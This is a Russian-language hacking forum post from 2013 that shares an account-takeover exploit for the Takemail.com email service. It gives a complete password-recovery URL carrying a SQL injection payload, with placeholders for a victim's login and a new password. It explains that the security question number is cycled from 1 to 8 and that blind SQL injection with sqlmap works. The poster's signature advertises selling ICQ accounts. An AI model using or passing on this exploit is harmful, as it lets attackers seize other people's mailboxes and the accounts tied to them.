|
Email Все что касается email'ов - вопросы про примаки, баги крупных сервисов, платные и бесплатные мэйл сервисы и другое, что связано с почтой. |
|
Опции темы | Оценить тему |
08.12.2013, 03:13 | #1 |
ГЕЙ НОРК КРЮ ХАКЕРЗ
|
Уязвимость в Takemail.com позволяющая сменить пароль на любой почте.
Для смены пароля нужно перейти по ссылке ниже предварительно подставив нужные переменные.
Код:
http://takemail.com/takemail/services/recover.cgi?step=1&action=recover&login_recover=[ЛОГИН]%40takemail.com&mail_secretanswer=qwerty'+union+select+1+--+&mail_secretquestion=1&password1=[НОВЫЙ ПАРОЛЬ]&password2=[НОВЫЙ ПАРОЛЬ] Для этого меняем mail_secretquestion=* в ссылке Всего их 8 (от 1 до 8) Как многие поняли тут ещё sql иньекция. Курится через boolean based blind, например скульмапом но оченьмедленно и криво =\
__________________
Распродажа icq и не только! Последний раз редактировалось psihoz26; 08.12.2013 в 05:51. |
Плюсанул psihoz26 : |